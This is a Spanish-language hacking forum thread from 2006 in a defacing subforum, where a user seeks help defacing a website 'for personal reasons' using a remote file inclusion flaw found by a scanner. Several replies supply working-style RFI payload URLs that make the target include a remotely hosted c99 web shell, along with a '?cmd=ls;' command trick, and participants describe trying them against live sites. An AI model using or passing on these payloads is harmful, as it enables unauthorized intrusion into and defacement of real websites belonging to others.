Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 02:06:12
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Alguien save lo que me pasa?! 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Alguien save lo que me pasa?!  (Leído 580 veces)
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« en: Octubre 03, 2006, 05:44:17 »

Bueno necesito un empujon con una cosilla, e pasado el SSS a una pagina que quiero desfacear por motivos personales (no la pondre porque quiero hacerlo yo y aprender). Bueno me a dado una vulnerabilidad que me a llamado a atención. Es la siguiente:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
Quisiera saver para que sirve esto, e puesto envez de victima la pagina que quiero en este caso victima.org y lo que viene a continuación y lo que me mostro fue la pagina de inicio normal.
Alguien save como se puede aprovechar esta vulnerabilidad? Dsd ya Gracias !
Bye !
« Última modificación: Octubre 03, 2006, 02:11:27 por NorK » En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
anonimox
Visitante
« Respuesta #1 en: Octubre 03, 2006, 09:18:36 »

la verdad que a todos los servidores q probe con esa vuln ninguna me sirvio...
y me paso lo mismo q te paso a vos....


salu2
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #2 en: Octubre 04, 2006, 02:07:42 »

Bueno esperemos que alguien de aqui sepa ayudarnos ya que no unicamente ami me pasa.
Bye ! =)
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
The_novato
Visitante
« Respuesta #3 en: Octubre 04, 2006, 02:59:12 »

En línea
computin
Visitante
« Respuesta #4 en: Octubre 05, 2006, 01:45:49 »

en la parte donde dice SHELL tienes que poner una shell osea la direccion algo asi:

webvulnerable.com/index.php?page="SHELL"

ahora en donde dice shell pones esto

webvulnerable.com/index.php?page=
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Para eso tienes que tener una Shell y saber usarla es sencillo
En línea
anonimox
Visitante
« Respuesta #5 en: Octubre 05, 2006, 06:33:05 »

emm la verdad que yo si se eso....

pero igual no funciona asi...


salu2
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #6 en: Octubre 06, 2006, 06:55:55 »

Gracias, ahora me pongo a darle a Buscar i me informo sobre shells xD
bye!
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
arquimedes
Visitante
« Respuesta #7 en: Octubre 06, 2006, 07:38:05 »

x experiencia propia digo q casi siempre al final de la shell ay q poner una interrogacion, Quedaria algo asi:
Código:
http://webvulnerable.com/index.php?page=http://tuweb.com/shell.php?
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #8 en: Octubre 06, 2006, 08:49:27 »

No encuentro nada sobre Shells y como aplicarlas aki :S
Alguien me echa una mano? plx
Dsd ya gracias
Bye !
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #9 en: Octubre 06, 2006, 09:24:16 »

u_u lee las respuestas lo an dejado bien klaro
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Activar photoshop cs2


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Como poner mi firma
3nst31n
Miembro
*****
Desconectado Desconectado

Mensajes: 71


Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!

parida_gus@hotmail.com
Ver Perfil WWW Email
« Respuesta #10 en: Octubre 06, 2006, 09:41:20 »

x dona k sea tan pesimista xo hace 1 semanaa k intento hackear un foro kon el zen cart y nada de nada

aki tienes la shell k uso.


luego pones de shell.txt pones  ?cmd=ls;

kedarias algo asi


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

te lo doy en txt x k una shell es un clavo ok?
pues por un lado duele x el otro no, para darle la vuelta al clavo y k no te duela a ti sino a la web, le kambias el formato y lo de cmd=ls es para k se de kuenta k es un shell.

son palabras textuales sacadas de este foro, x favor buska un poko k no kuesta nada^^


edit

aki te doy un shell k en teoria es para el zen cart aunk a mi no me funciona !^^

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
« Última modificación: Octubre 06, 2006, 09:49:22 por enstein » En línea
arquimedes
Visitante
« Respuesta #11 en: Octubre 06, 2006, 02:04:34 »

joder ay que poner algo de tu parte.Yo utilizo una shell rusa mu wena c99.este es el link:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
http://crashz.by.ru/shell/c99.txt

Con esta tu codigo quedaria asi:
Código:
http://webvulnerable.com/index.php?page=http://crashz.by.ru/shell/c99.txt?
En línea
3nst31n
Miembro
*****
Desconectado Desconectado

Mensajes: 71


Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!

parida_gus@hotmail.com
Ver Perfil WWW Email
« Respuesta #12 en: Octubre 06, 2006, 02:15:42 »

arquimedes, akabo dde probar tu shell kon un foro vulnerable y no va  ^^!
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #13 en: Octubre 06, 2006, 02:26:38 »

xDDD pues algo aces mal porke la shell si va xDD

En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Activar photoshop cs2


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Como poner mi firma
3nst31n
Miembro
*****
Desconectado Desconectado

Mensajes: 71


Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!

parida_gus@hotmail.com
Ver Perfil WWW Email
« Respuesta #14 en: Octubre 07, 2006, 01:13:35 »

azmo a mi me parece k no, mira yo pongo esto


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

y me sale la web normal unk puede ser xk al ser .foros.ws este parcheada o algo, xo busko vulnerabilidades me sale k es vulnerable ^^ Huh  no se k hacer!?!?!?
En línea
Azmo
Colaborador
*****
Desconectado Desconectado

Mensajes: 557



Ver Perfil
« Respuesta #15 en: Octubre 07, 2006, 01:39:12 »

xDDDD de donde as sacado eso xDD


lo de index.php?page= es solo un ejemplo y no un bug real y mucho menos de foros phpbb ke no tienen bugs rfi conocidos ke yo sepa
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Activar photoshop cs2


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Como poner mi firma
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #16 en: Octubre 07, 2006, 02:14:29 »

Nose en que me equivoco, pongo esto

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
como dijo arquimedes y me sale:
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
Nose que ago mal, talvez sea alguna tonteria pero llevo 3 dias leiendo sin parar y no saco nada en claro.
Bye!
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
3nst31n
Miembro
*****
Desconectado Desconectado

Mensajes: 71


Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!

parida_gus@hotmail.com
Ver Perfil WWW Email
« Respuesta #17 en: Octubre 07, 2006, 02:19:32 »

yo no se k acer kon esto mira te doy lo k pongo en la  barra


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

(si no puedo poner la web duganmelo y lo edito)
En línea
arquimedes
Visitante
« Respuesta #18 en: Octubre 07, 2006, 02:39:05 »

el Link de esa shell esta perfecto, lo e utilizado recientemente y funciona perfectamente.
Lo de que no os funciona puede ser x 2 cosas:
1.-La web ya esta parcheada.Lo cual explicaria el fallo de
Código:
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
2.-O q el bug que teneis no es correcto.
Esto puede ser xq en el sss os a salido esto:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
entonces para entrar n la pagina el link os quedaria asi:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://crashz.by.ru/shell/c99.txt?
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #19 en: Octubre 07, 2006, 02:50:28 »

Vale e puesto esto:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://crashz.by.ru/shell/c99.txt?
y ahora me sale el index de la pagina pero es lo mismo que si pusiera
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.webdelavictima.com
, nose que hacer....
Dsd ya gracias!
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
arquimedes
Visitante
« Respuesta #20 en: Octubre 07, 2006, 05:19:54 »

no se la uncia explicacion q l encuentro s q ese bug ya este subsanado o que este mal.
ya siento no poder ayudarte mas
En línea
3nst31n
Miembro
*****
Desconectado Desconectado

Mensajes: 71


Soy Un cOMplETo nOOb, xO koN aNimOS dE aPreNdER!!

parida_gus@hotmail.com
Ver Perfil WWW Email
« Respuesta #21 en: Octubre 07, 2006, 09:12:14 »

nork kreo k este exploit(zen cart) no nos servira, te recomiendo k actualizes tu scanner y buelve a buskar :-\

o sino kambia de scanner
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderaci贸n
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #22 en: Octubre 07, 2006, 01:08:16 »

Segun tengo entendido el SSS es muy bueno y es el que utilizo y me detecta estos bugs ;/ Bueno yo seguire intentandolo e informandome y si lo resuelvo lo posteare aqui para proximas ocasiones, gracias por ayudar ;]
Bye!
En línea



Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Alguien save lo que me pasa?! « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC